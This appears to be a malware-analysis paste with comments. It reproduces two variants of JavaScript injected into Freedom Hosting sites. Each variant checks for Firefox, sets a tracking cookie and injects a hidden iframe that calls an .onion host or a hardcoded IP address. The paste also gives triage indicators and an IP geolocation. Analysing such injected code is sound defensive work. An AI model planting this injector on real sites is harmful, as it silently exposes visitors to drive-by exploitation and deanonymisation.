- # MalwareMustDie!
- # This is the set of malicious JavaScript code injected into the Freedom Hosting site.
- # It contains the IFRAMER malware method, which redirects the victim to the infector site at the URL:
- # http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0
- #
- # Original copy at: www.twitlonger.com/show/n_1rlo0uu
- # See the Iframer part and tell me if this is NOT adapting malware techniques, and NOT blindly infecting every visitor to that site!!
- # Anyone who accessed an FH site with Firefox & JavaScript enabled must have been affected by this IFRAMER.
- # Case: FBI infects malware in public anonymous network http://blog.malwaremustdie.org/2014/08/what-is-bad-stays-bad-legalized-any.html
- # Ref: http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/
- # Ref: https://www.mozilla.org/security/announce/2013/mfsa2013-53.html
- # Ref: http://www.twitlonger.com/show/n_1rlo0uu
- # Ref: http://pastebin.com/bu2Ya0n6
- # Ref: http://pastebin.com/pmGEj9bV
- // Case 1
- // Cookie writer used by the injected script: stores name=value in document.cookie with path=/.
- // When `minutes` is truthy an "expires" attribute that many minutes ahead is appended;
- // otherwise no expiry attribute is written.
- function createCookie(name,value,minutes) {
- if (minutes) {
- var date = new Date();
- // minutes -> milliseconds, added to the current time
- date.setTime(date.getTime()+(minutes*60*1000));
- var expires = "; expires="+date.toGMTString();
- }
- else var expires = "";
- // name and value are concatenated as-is (no encoding); the callers on this page pass fixed strings
- document.cookie = name+"="+value+expires+"; path=/";
- }
- // Cookie reader used by the injected script: returns the value of the first cookie whose
- // text starts with name + "=", or null when document.cookie holds no such entry.
- function readCookie(name) {
- var nameEQ = name + "=";
- var ca = document.cookie.split(';');
- for(var i=0;i < ca.length;i++) {
- var c = ca[i];
- // drop the leading spaces left behind by splitting on ';'
- while (c.charAt(0)==' ') c = c.substring(1,c.length);
- if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
- }
- return null;
- }
- // Browser fingerprint gate: evaluates truthy when either of two Gecko-specific properties
- // (document.getBoxObjectFor, window.mozInnerScreenX) is non-null or the user agent string
- // matches /Firefox/i. isReady() only runs the iframe path when this is truthy.
- // NOTE(review): the Firefox-only targeting is consistent with the Mozilla advisory listed in
- // this paste's references, but the framed content itself is not shown here.
- function isFF() {
- return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
- }
- // Iframe injector (Case 1): builds a borderless, non-scrolling iframe with height "5" and
- // appends it to document.body, which makes the browser request the src URL.
- // For triage, the indicators in this block are the .onion host and the requestID value in src.
- // What the framed page serves is not visible in this paste.
- function updatify() {
- var iframe = document.createElement('iframe');
- iframe.style.display = "inline";
- iframe.frameBorder = "0";
- iframe.scrolling = "no";
- // the requestID here is the same UUID that format_quick() stores in the n_serv cookie
- iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0";
- iframe.height = "5";
- // width is set to the literal "*", which is not a numeric length
- iframe.width = "*";
- document.body.appendChild(iframe);
- }
- // Once-per-cookie trigger (Case 1): when no "n_serv" cookie is readable, sets n_serv to the
- // fixed UUID with a 30-minute lifetime and then injects the iframe via updatify().
- // While that cookie persists the iframe is not injected again, so an n_serv cookie carrying
- // this UUID in a browser profile is an indicator that this script ran there.
- function format_quick() {
- if ( ! readCookie("n_serv") ) {
- createCookie("n_serv", "203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0", 30);
- updatify();
- }
- }
- // Entry-point poller (Case 1): waits until document.readyState is "interactive" or
- // "complete", then calls format_quick() only when isFF() is truthy.
- // Until the document is ready it re-arms itself every 250 ms; once ready it never re-arms,
- // so a browser that fails the isFF() check gets no iframe and no cookie.
- function isReady()
- {
- if ( document.readyState === "interactive" || document.readyState === "complete" ) {
- if ( isFF() ) {
- format_quick();
- }
- }
- else
- {
- setTimeout(isReady, 250);
- }
- }
- setTimeout(isReady, 250);
- // Case 2
- // Case 2 copy of the cookie writer; differs from the Case 1 copy only in spacing and brace layout.
- // Stores name=value in document.cookie with path=/, adding an "expires" attribute
- // `minutes` minutes ahead when `minutes` is truthy.
- function createCookie(name, value, minutes) {
- if (minutes) {
- var date = new Date();
- // minutes -> milliseconds, added to the current time
- date.setTime(date.getTime() + (minutes * 60 * 1000));
- var expires = "; expires=" + date.toGMTString();
- } else var expires = "";
- // name and value are concatenated as-is (no encoding); the callers on this page pass fixed strings
- document.cookie = name + "=" + value + expires + "; path=/";
- }
- // Case 2 copy of the cookie reader; differs from the Case 1 copy only in spacing.
- // Returns the value of the first cookie whose text starts with name + "=", else null.
- function readCookie(name) {
- var nameEQ = name + "=";
- var ca = document.cookie.split(';');
- for (var i = 0; i < ca.length; i++) {
- var c = ca[i];
- // drop the leading spaces left behind by splitting on ';'
- while (c.charAt(0) == ' ') c = c.substring(1, c.length);
- if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
- }
- return null;
- }
- // Case 2 copy of the browser gate, identical to the Case 1 copy: truthy when
- // document.getBoxObjectFor or window.mozInnerScreenX is non-null, or when the user agent
- // string matches /Firefox/i.
- function isFF() {
- return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
- }
- // Iframe injector (Case 2): same construction as Case 1 (borderless, non-scrolling, height "5",
- // appended to document.body), but the src points at an IPv4 address over plain HTTP instead of
- // an .onion host. For triage, the indicators in this block are that address and the requestID value.
- // What the framed page serves is not visible in this paste.
- function updatify() {
- var iframe = document.createElement('iframe');
- iframe.style.display = "inline";
- iframe.frameBorder = "0";
- iframe.scrolling = "no";
- // The text after the semicolon on the next line ("<== (1) ...") is the analyst's annotation,
- // not part of the captured script; the note at the end of the paste refers back to it.
- iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66"; <== (1) 1ST CALLBACK SELF EXPLANATORY
- iframe.height = "5";
- // width is set to the literal "*", which is not a numeric length
- iframe.width = "*";
- document.body.appendChild(iframe);
- }
- // Once-per-cookie trigger (Case 2): same logic as format_quick() in Case 1 under a different
- // name and with a different UUID. When no "n_serv" cookie is readable it sets n_serv to the
- // UUID for 30 minutes and injects the iframe; the UUID matches the requestID in updatify()'s src.
- // An n_serv cookie carrying this UUID is an indicator that this script ran in the browser.
- function freedomhost() {
- if (!readCookie("n_serv")) {
- createCookie("n_serv", "eb5f2c80-fc81-11e2-b778-0800200c9a66", 30);
- updatify();
- }
- }
- // Entry-point poller (Case 2): waits until document.readyState is "interactive" or
- // "complete", then calls freedomhost() only when isFF() is truthy; otherwise re-arms every 250 ms
- // until the document is ready. A browser that fails the isFF() check gets no iframe and no cookie.
- function isReady() {
- if (document.readyState === "interactive" || document.readyState === "complete") {
- if (isFF()) {
- // the commented-out alert below is present in the sample as captured
- //window.alert(window.location + "Firefox Detected.")
- freedomhost();
- }
- } else {
- setTimeout(isReady, 250);
- }
- }
- setTimeout(isReady, 250);
- // Note: same method in both cases;
- // the second script's callback goes to an IP address (info below), contacting the remote host at the line marked (1).
- IP Address: 65.222.202.53
- City: Triadelphia
- State or Region: West Virginia
- Country: United States
- ISP: Verizon Business
- Latitude & Longitude: 40.0900, -80.6220
- Domain: verizonbusiness.com
- ZIP Code: 26059
- ---
- #MalwareMustDie! @unixfreaxjp